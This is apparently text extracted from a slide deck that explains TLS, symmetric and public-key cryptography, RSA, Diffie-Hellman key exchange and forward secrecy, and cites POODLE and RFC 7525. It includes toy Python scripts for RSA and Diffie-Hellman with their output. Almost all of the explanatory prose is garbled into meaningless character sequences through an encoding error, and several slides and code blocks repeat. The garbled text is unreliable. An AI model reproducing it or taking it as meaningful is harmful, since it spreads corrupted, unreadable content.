ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͸͍͔ͭ͋͘Δ͕ ઀ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ๷͙ज़͸ແ͍ͨΊ ΠϯλʔωοτΛհͨ͠௨৴͸ ؒʹѱҙ͋Δୈࡾऀ͕͍Δ΋ͷͱͯ͠ ௨৴Λߦ͏ඞཁ͕͋Δ

Πϯλʔωοτ͸఻ݴήʔϜͩ ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ͸ ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ ઀ଓઌ ܦ༝ͨ͠ϗετͷ਺Λhop਺ͱݺͿ 1hop 2hop 3hop 4hop 5hop

Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ͸ ௨৴಺༰ؙ͕ݟ͑Ͱ͋Δ ઀ଓઌ

Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸ ࣍ͷϗετʹਖ਼͘͠௨৴಺༰Λ఻͑ͳ͍͔΋͠Εͳ͍ ઀ଓઌ

Πϯλʔωοτ͸఻ݴήʔϜͩ ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸ ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢΋͠Εͳ͍ Bob Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢ Charlie Alice

ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ

ڞ௨伴҉߸ H e l l o , sp W o
r l d ! nl 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a m 8 can dc1 si vt n 9 n del : syn M f R + ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b H e l l o , sp W o r l d ! nl 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a 伴Λ࢖ͬͯม׵ 伴Λ࢖ͬͯٯม׵ ͲͷΑ͏ʹม׵͢Δ͔ʹҧ͍͕͋Δ ෳ਺ͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ

ྑ͍ڞ௨伴҉߸ͱ͸ ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ શͯͷ伴Λࢼ͢ΑΓޮ཰ͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍ ͜ΕΛূ໌͢Δͷ͕ࠔ೉ ͜Ε͸伴Λ௕͘͢Ε͹࣮ݱͰ͖Δ

ΞϧΰϦζϜ͕޿͘ར༻͞Ε͍ͯͯ ͦΕͰ΋ޮ཰ͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸͸ গͳ͘ͱ΋ࠓͷͱ͜Ζ͸҆શͰ͋Δͱߟ͑ΒΕΔ ҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ ͜ͷ෦෼Λຬͨ͢ͷ͕ࠔ೉ʹͳΔ ∴҉߸ΞϧΰϦζϜͷࣗ࡞͸ΦεεϝͰ͖ͳ͍ ্هͷ৚݅Λຬͨ͢ طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏

ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ ޿͘ར༻͞Ε͍ͯΔ͚Ͳ ޮ཰ͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸ Advanced Encryption Standard (AES) Blowfish ͳͲͳͲ ϒϩοΫ҉߸
ετϦʔϜ҉߸ Chacha20

ڞ௨伴҉߸ͷ伴഑ૹ໰୊ ҉߸Λ΍ΓऔΓ͢ΔͨΊʹ͸伴͕ඞཁ ͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ࢖͍ͬͯΔ৔߹ ౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛ࢖ͬͯ૬खʹ伴Λ౉ͤͳ͍ ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ ҉߸ͷҙຯ͕ͳ͍ Bob Alice

ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗ NEW!

ެ։伴҉߸ ୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠΋ ͦͷ伴Ͱ௨৴಺༰Λ෮߸͢Δ͜ͱ͸Ͱ͖ͳ͍ ෮߸͢Δͷʹඞཁͳ ൿີ伴 ͸ଞਓʹڭ͑ͳ͍ ҉߸Խͱ෮߸ʹҟͳΔ伴Λ࢖͏҉߸ΞϧΰϦζϜ ҉߸Խʹඞཁͳ ެ։伴 Λ௨৴૬खʹૹΔ
௨৴૬ख͸ެ։伴Λ࢖ͬͯ 伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ

ެ։伴҉߸ =15 =-15 =42 =57 42+15=57 57-15=42 ͜Μͳ҉߸ͩͱ ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏ ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍

RSA ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕ ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍ 373*61=22753Ͱ͋Δ͜ͱ͸؆୯ʹٻ·Δ͕ 22753͕373ͱ61ʹ෼ղͰ͖Δ͜ͱΛ ಉ͘͡Β͍؆୯ʹٻΊΔํ๏͸஌ΒΕ͍ͯͳ͍ ૉҼ਺෼ղ͕ඞཁ ͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ ๲େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ

#!/usr/bin/env python3 # -*- coding: utf-8 -*- def egcd( x,
y, a = 0, b = 1 ): div, mod = divmod( x, y ) if mod == 0: return ( y, a ) return egcd( y, mod, b - div * a, a ) def modinv( x, y ): a, b = egcd( x, y ) if a != 1: raise Exception( 'no modinv') return b % y def generate_key_pair(): prime_nums = [ 116903, 215443, 139721 ] public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ] private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) ) return ( public_key, private_key ) public_key, private_key = generate_key_pair(); print( 'ൿີ伴:\t%d' % private_key ) print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) ) plain = 0x686f6765 print( 'ݪจ:\t%X' % plain ) crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] ) print( '҉߸Խ:\t%X' % crypted ) decrypted = pow( crypted, private_key, public_key[ 0 ] ) print( '෮߸:\t%X' % decrypted ) $ ./crypto.py ൿີ伴: 15753325457 ެ։伴: 25185933029,139721 ݪจ: 686F6765 ҉߸Խ: 2779B8996 ෮߸: 686F6765 RSA

def egcd( x, y, a = 0, b = 1
): div, mod = divmod( x, y ) if mod == 0: return ( y, a ) return egcd( y, mod, b - div * a, a ) def modinv( x, y ): a, b = egcd( x, y ) if a != 1: raise Exception( 'no modinv') return b % y def generate_key_pair(): prime_nums = [ 116903, 215443, 139721 ] public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ] private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) ) return ( public_key, private_key ) public_key, private_key = generate_key_pair(); print( 'ൿີ伴:\t%d' % private_key ) print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) ) plain = 0x686f6765 print( 'ݪจ:\t%X' % plain ) crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] ) print( '҉߸Խ:\t%X' % crypted ) decrypted = pow( crypted, private_key, public_key[ 0 ] ) print( '෮߸:\t%X' % decrypted ) $ ./crypto.py ൿີ伴: 15753325457 ެ։伴: 25185933029,139721 ݪจ: 686F6765 ҉߸Խ: 2779B8996 ෮߸: 686F6765 RSA ͋Δ੔਺nͱૉͳ1Ҏ্nະຬͷ ࣗવ਺ͷ਺ΛٻΊΔؔ਺Λ ΦΠϥʔͷτʔγΣϯτؔ਺φ(n)ͱݺͿ ૉ਺ͷఆٛΑΓn͕ૉ਺ͷ৔߹φ(n)͸n-1ʹͳΔ φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕஌ΒΕ͍ͯΔ aͱbΛ஌͍ͬͯΔͱφ(ab)͸ఆ਺࣌ؒͰٻ·Δ͕ ab͔͠Θ͔Βͳ͍৔߹φ(ab)͸ࢦ਺࣌ؒΛཁ͢Δ ͜ͷඇରশੑΛ࢖ͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔ೉ʹ͢Δ

ެ։伴ΛૉҼ਺෼ղ͢Ε͹ൿີ伴ʹͨͲΓண͚Δ ༰қͰ͸ͳ͍͕ ૯౰ͨΓͰ伴Λ୳͢ΑΓ͸୹࣌ؒͰߦ͑ͯ͠·͏

ૉҼ਺෼ղ͸େ͖ͳ਺ʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳ਺Λ伴ͱ͢Δ͜ͱͰ ൿີ伴͕όϨΔͷΛ๷͙ RSAͷ৔߹伴௕768bitҎԼͷ΋ͷ͸ ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕஌ΒΕ͍ͯΔ ͜ͷΑ͏ͳݹ͍伴͸ΑΓ௕͍伴ʹߋ৽͠ͳ͚Ε͹ͳΒͳ͍ ެ։伴҉߸ͷ伴௕͸ૉҼ਺෼ղʹ͔͔Δ࣌ؒͰܾΊΔ

Bob Charlie தؒऀ߈ܸ ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ! Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢ ௨৴૬ख͕ຊ෺Ͱ͋Δ͜ͱΛ͔֬Ίͳ͚Ε͹ͳΒ͍

ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ ӨڹΛड͚ͳ͍ͨΊʹ͸ ௨৴಺༰Λ҉߸Խ ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗ NEW!

Bob ೝূہ BobຊਓͰ͋Δ͜ͱΛ ෺ཧతͳํ๏Ͱ֬ೝͯ͠ ൿີ伴Λൃߦ ެ։伴Λऔಘ αʔόূ໌ॻ ެ։伴Λ࢖ͬͯ҉߸Խͨ͠σʔλ͸ ຊ෺ͷBob͚͕ͩಡΊΔ ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕
ଞਓͷखʹ౉ͬͯ͠·ͬͨ৔߹ ೝূہ͸ͦͷ伴Λࣦޮͤ͞Δ

Transport Layer Security ུͯ͠TLS ੲ͸SSLͱݺ͹Ε͍ͯͨ ͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨ RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮૷͕ଘࡏ͢Δ ࣌୅ͱͱ΋ʹ҆શͳ҉߸͸มΘΔͨΊTLS͸༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ [1] https://www.ietf.org/rfc/rfc5246.txt
௨৴಺༰Λ҉߸Խ ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗

Transport Layer Security ෺ཧ૚ σʔλϦϯΫ૚ TCP/IP ௨৴Λߦ͏ΞϓϦέʔγϣϯ TLS TLSΛ࢖͏ΞϓϦέʔγϣϯ͸ TLSʹ௨৴σʔλΛ౉͢
TLS͸௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍ ҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ TCP/IPͷιέοτʹྲྀ͢ TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ ҉߸ʹؔ͢Δ໘౗ࣄΛ ࣗ෼Ͱ࣮૷͢Δඞཁ͕ͳ͘ͳΔ

RSAΛ༻͍ͨTLS ެ։伴Λऔಘ nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴
༗ޮͳެ։伴Ͱ҉߸Խͨ͠஋Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ͸ ڞ௨伴͸ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ ຊ෺ͷ௨৴૬ख͸ ൿີ伴Ͱ nΛऔΓग़ͤΔ Bob Alice

RSAΛ༻͍ͨTLS औಘ nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴
͜ͷ࣌ͷ௨৴Λه࿥͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ ͜ͷ࣌఺Ͱ͸ڞ௨伴҉߸ͷ伴΋ൿີ伴΋Θ͔Βͳ͍ͨΊ ୈࡾऀ͸௨৴ͷ಺༰Λ஌Δ͜ͱ͕Ͱ͖ͳ͍ Bob Alice

nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ
ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β ڞ௨伴ΛऔΓग़ͯ͠ શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ

nΛެ։伴Ͱ҉߸Խͯ͠౉͢ ͋Δཚ਺nΛ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ڞ௨伴҉߸Ͱ ҉߸Խ͞Εͨ௨৴ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ
nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ϑΥϫʔυηΩϡϦςΟ ௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ΋ ͦΕ·ͰʹߦΘΕͨ௨৴಺༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍ ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β ڞ௨伴ΛऔΓग़ͯ͠ શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ

཭ࢄର਺໰୊ G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a
< p) ͜ͷΑ͏ͳࣜʹ͓͍ͯ xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕ xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ ಛʹp͕ڊେͳૉ਺ͷ৔߹ aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

Diffie-Hellman伴ڞ༗ G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a
< p) ͜ͷΑ͏ͳࣜʹ͓͍ͯ xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕ xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ ͜ͷඇରশੑΛ࢖ͬͯ௨৴ܦ࿏্ʹݟ͑Δ৘ใ͚ͩͰ͸ ༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ ಛʹp͕ڊେͳૉ਺ͷ৔߹ aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

Diffie-Hellman伴ڞ༗ ͋Δཚ਺aΛ࡞Δ ͋Δཚ਺bΛ࡞Δ Ga = xa mod p Gb =
xb mod p n = Gba mod p n = Gab mod p n͸ͲͪΒͷܭࢉํ๏Ͱ΋ ಉ͡஋ʹͳΔ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ nΛ΋ͱʹ ڞ௨伴Λ࡞Δ ͜͜Ͱަ׵͞ΕΔGa Gb ͔Β aͱbΛ஌Δࣄ͸Ͱ͖ͳ͍

#!/usr/bin/env python3 # -*- coding: utf-8 -*- import random random.seed()
# pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) key2=pow( public1, secret2, p ) print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 ) print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 ) Diffie-Hellman伴ڞ༗ $ ./dh.py Alice͕࡞ͬͨൿີͷ஋: 118909 Bob͕࡞ͬͨൿີͷ஋: 89005 Alice͔ΒBobʹૹΔ஋: 26981 Bob͔ΒAliceʹૹΔ஋: 123319 Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243

#!/usr/bin/env python3 # -*- coding: utf-8 -*- import random random.seed()
# pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) key2=pow( public1, secret2, p ) print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 ) print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 ) Diffie-Hellman伴ڞ༗ $ ./dh.py Alice͕࡞ͬͨൿີͷ஋: 118909 Bob͕࡞ͬͨൿີͷ஋: 89005 Alice͔ΒBobʹૹΔ஋: 26981 Bob͔ΒAliceʹૹΔ஋: 123319 Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243 7243ͱ͍͏஋Λڞ༗Ͱ͖ͨ ͜ͷ஋Λ΋ͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ

Diffie-Hellman Ephemeral Ұ࣌త #!/usr/bin/env python3 # -*- coding: utf-8 -*-
import random random.seed() # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ p=152219 # ೚ҙͷૉ਺ x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺ # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍ secret1=random.randint(2,p) secret2=random.randint(2,p) print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 ) print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 ) # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ public1=pow( x, secret1, p ) public2=pow( x, secret2, p ) print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 ) print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 ) # ͜ͷ஋͕Ұக͢Δ key1=pow( public2, secret1, p ) ͜ͷ஋Λ伴ڞ༗Λߦ͏౓ʹ มߋ͢Δ ͜ͷ஋͕ແ͍ͱ伴Λ ಛఆͰ͖ͳ͍͕ ͜ͷ஋ࣗମ͸౪ௌͰ͖ͳ͍ͨΊ ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ ൿີͷ஋͕ຖճมΘΔͷͰ૬ख͕ຊ෺͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ ૬ख͕ຊ෺Ͱ͋Δ͜ͱͷ֬ೝ͸RSAΛ࢖ͬͯߦ͏

DHE-RSA-AES256-SHA256 TLS͕Diffie-Hellman伴ڞ༗Λ࢖͍ͬͯΔ͔Ͳ͏͔ TLSͷ҉߸εΠʔτ໊ΛݟΕ͹Θ͔Δ ڞ௨伴ͷڞ༗ʹ Diffie-Hellman Ephemeral Λ࢖͏ ௨৴૬ख͕ຊ෺Ͱ͋ΔࣄΛ RSAͰ͔֬ΊΔ 256bitͷAESΛ࢖ͬͯσʔλΛ҉߸Խ͢Δ
σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ SHA-256ϋογϡΛ࢖͏

ପԁ཭ࢄର਺໰୊ ཭ࢄର਺໰୊͸ ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ ࢦ਺࣌ؒΛཁ͢Δ໰୊Ͱ͋Δ ٯࢉͰ͖ͳ͍Θ͚Ͱ͸ͳ͍ͷͰ े෼େ͖ͳ஋Λ࢖ͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ ପԁ཭ࢄର਺໰୊͸ ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕஌ΒΕ͍ͯͳ͍ ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ͸ ૯౰ͨΓ߈ܸʹ଱͑ΒΕΔఔ౓ͷେ͖͞ͷ஋Ͱྑ͍

ପԁۂઢDiffie-Hellman伴ڞ༗ ཭ࢄର਺໰୊ͷ୅ΘΓʹପԁ཭ࢄର਺໰୊Λ࢖͏ Diffie-Hellman伴ڞ༗ TLSʹ͓͍ͯ͸ Elliptic Curve Diffie-Hellman Ephemeral ུͯ͠ECDHEͱදه͞ΕΔ ݱ࣌఺Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴Λ஌ΒΕͳ͍ͨΊʹ
RFC7525Ͱਪ঑͞Ε͍ͯΔ஋ͷେ͖͞ %J⒏F)FMMNBO伴ڞ༗ ପԁۂઢ%J⒏F)FMMNBO伴ڞ༗ CJU CJU https://tools.ietf.org/html/rfc7525

͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋ ͓͍֮͑ͯͯཉ͍͠ࣄ ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠ ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏

TLS͸ྺ࢙͋ΔϓϩτίϧͳͷͰ ࠓ೔Ͱ͸҆શͱݴ͑ͳ͍҉߸ٕज़ʹ΋ରԠ͍ͯ͠Δ TLS͸઀ଓ࣌ʹαʔόͱΫϥΠΞϯτ͕࢖͑Δ҉߸ٕज़Λௐ΂ͯ ྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ ྫ͑͹ࠓ೔Ͱ͸ݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSA΍RC4ʹ΋ରԠ͍ͯ͠Δ SSL 2.0 SSL 3.0 TLS
1.0 TLS 1.1 TLS 1.2 TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥

ಡΊΔ SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS
1.2 TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥ 2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ ݹ͍҉߸ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ ऑ͍҉߸ ऑ͍҉߸ Alice Bob ౪ௌऀ

POODLE(CVE-2014-3566) https://nvd.nist.gov/vuln/detail/CVE-2014-3566 2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ SSL 3.0ͷن্֨ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ ͜͜ʹ /*45ʹΑΔ100%-&ͷղઆΛషΔ

SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2
TLS 1.3 com ing soon 1994೥ 1996೥ 1999೥ 2006೥ 2008೥ TLS 1.3Ͱ͸ࠓͰ͸҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β࢖༻ෆೳʹͳΔ TLS1.3͕ҰൠతʹͳΔ·Ͱ͸ TLS 1.2͕࣋ͭػೳͷ͏ͪ ةݥͱ͞Ε͍ͯΔػೳΛ੾ͬͨঢ়ଶͰӡ༻ SSL 3.0ͷΑ͏ͳຊ౰ʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख͸ ௨৴ΛఘΊͯ΋Β͏͔͠ͳ͍

RFC7525 Recommendations for Secure Use of Transport Layer Security (TLS)
and Datagram Transport Layer Security (DTLS) TLS 1.2ͷػೳͷ͏ͪ ԿΛ੾͓ͬͯ͘΂͖͔͕ ·ͱΊΒΕ͍ͯΔ IUUQTUPPMTJFUGPSHIUNMSGD ඇެࣜͳ೔ຊޠ༁IUUQTTVNNFSXJOEKQEPDTSGD ͜͜ʹ 3'$ͷ"CTUSBDUΛషΔ

͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋ ͓͍֮͑ͯͯཉ͍͠ࣄ ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠ ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏ TLSΛ࢖͏࣌͸ ࠓͰ͸҆શͰ͸ͳ͍ݹ͍ػೳΛ੾Ζ͏ NEW!

ຊ෺ͷϢʔβͱ ِ෺ͷϢʔβΛݟ෼͚Δ

ೝূ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ "MJDFͰ͢ "MJDFͰ͢ αʔό͕ຊ෺͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍ Ϣʔβ͸ূ໌ॻΛ͍࣋ͬͯͳ͍

ύεϫʔυೝূ ύεϫʔυ͸ Ͱ͢ ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏ ຊ෺ͷ"MJDFͳΒ ύεϫʔυΛ஌͍ͬͯΔഺ ʜ Alice Aliceͷ;ΓΛ͢Δ ѱҙ͋Δୈࡾऀ

